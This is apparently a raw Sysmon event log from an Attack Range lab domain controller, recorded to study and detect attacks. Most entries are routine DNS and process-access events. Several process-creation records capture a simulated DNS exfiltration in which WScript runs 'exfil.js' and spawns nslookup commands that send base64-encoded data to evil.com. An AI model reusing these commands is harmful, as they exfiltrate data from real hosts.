14:21:27.435{00000000-0000-0000-0000-000000000000}8040<unknown process>-udptruefalse127.0.0.1-50581-false127.0.0.1-53domain 354300x8000000000000000208039Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.435{00000000-0000-0000-0000-000000000000}8040<unknown process>-udpfalsefalse127.0.0.1-50580-false127.0.0.1-53domain 354300x8000000000000000208038Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.435{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50580- 354300x8000000000000000208037Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.435{00000000-0000-0000-0000-000000000000}8040<unknown process>-udptruefalse127.0.0.1-50580-false127.0.0.1-53domain 354300x8000000000000000208036Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.435{00000000-0000-0000-0000-000000000000}8040<unknown process>-udpfalsefalse127.0.0.1-50579-false127.0.0.1-53domain 354300x8000000000000000208035Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.433{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50579- 354300x8000000000000000208034Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.433{00000000-0000-0000-0000-000000000000}8040<unknown process>-udptruefalse127.0.0.1-50579-false127.0.0.1-53domain 354300x8000000000000000208033Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.352{00000000-0000-0000-0000-000000000000}5332<unknown process>-udpfalsefalse127.0.0.1-50578-false127.0.0.1-53domain 354300x8000000000000000208032Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.352{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local61906-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000208031Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.351{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local61906-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000208030Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.351{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50578- 10341000x8000000000000000208029Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.128{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E9-629A-4343-000000005F02}6672C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 354300x8000000000000000208028Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.351{00000000-0000-0000-0000-000000000000}5332<unknown process>-udptruefalse127.0.0.1-50578-false127.0.0.1-53domain 354300x8000000000000000208027Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.351{00000000-0000-0000-0000-000000000000}5332<unknown process>-udpfalsefalse127.0.0.1-50577-false127.0.0.1-53domain 354300x8000000000000000208026Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.350{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50577- 354300x8000000000000000208025Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.350{00000000-0000-0000-0000-000000000000}5332<unknown process>-udptruefalse127.0.0.1-50577-false127.0.0.1-53domain 354300x8000000000000000208024Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.350{00000000-0000-0000-0000-000000000000}5332<unknown process>-udpfalsefalse127.0.0.1-50576-false127.0.0.1-53domain 354300x8000000000000000208023Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.350{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50576- 354300x8000000000000000208022Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.350{00000000-0000-0000-0000-000000000000}5332<unknown process>-udptruefalse127.0.0.1-50576-false127.0.0.1-53domain 354300x8000000000000000208021Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.276{00000000-0000-0000-0000-000000000000}7960<unknown process>-udpfalsefalse127.0.0.1-50575-false127.0.0.1-53domain 354300x8000000000000000208020Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.886{00000000-0000-0000-0000-000000000000}6016<unknown process>-udpfalsefalse127.0.0.1-50562-false127.0.0.1-53domain 354300x8000000000000000208019Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.880{00000000-0000-0000-0000-000000000000}6016<unknown process>-udptruefalse127.0.0.1-50562-false127.0.0.1-53domain 354300x8000000000000000208018Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.879{00000000-0000-0000-0000-000000000000}6016<unknown process>-udpfalsefalse127.0.0.1-50561-false127.0.0.1-53domain 354300x8000000000000000208017Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.685{00000000-0000-0000-0000-000000000000}4228<unknown process>-udptruefalse127.0.0.1-50556-false127.0.0.1-53domain 10341000x8000000000000000208016Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.112{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208015Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.112{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208014Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.112{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208013Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.112{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208012Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.112{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E9-629A-4243-000000005F02}5044C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208011Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.112{2E1864BB-18E0-629A-6742-000000005F02}39764864C:\Windows\System32\WScript.exe{2E1864BB-18E9-629A-4243-000000005F02}5044C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208010Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.124{2E1864BB-18E9-629A-4243-000000005F02}5044C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlefhza.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000208009Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.112{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlwzs.tmpMD5=08096E815298C9510FB964E33BF683ED,SHA256=94103DD12783300292E08E6F36A36F71864DF751648CBC0CFA38A7881E3764D7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000208008Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.097{2E1864BB-18E9-629A-4043-000000005F02}70447008C:\Windows\system32\conhost.exe{2E1864BB-18E9-629A-4143-000000005F02}5960C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208007Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.097{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208006Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.097{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208005Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.097{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208004Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.097{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E9-629A-4143-000000005F02}5960C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208003Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.097{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208002Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.081{2E1864BB-18E9-629A-3F43-000000005F02}1696684C:\Windows\system32\cmd.exe{2E1864BB-18E9-629A-4143-000000005F02}5960C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208001Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.096{2E1864BB-18E9-629A-4143-000000005F02}5960C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E9-629A-3F43-000000005F02}1696C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwzs.tmp 2>&1 10341000x8000000000000000208000Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.081{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18E9-629A-4043-000000005F02}7044C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207999Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.081{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E9-629A-4043-000000005F02}7044C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207998Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.076{2E1864BB-18E9-629A-4043-000000005F02}70447008C:\Windows\system32\conhost.exe{2E1864BB-18E9-629A-3F43-000000005F02}1696C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207997Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.059{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E9-629A-4043-000000005F02}7044C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207996Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.059{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207995Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.059{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207994Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.059{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207993Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 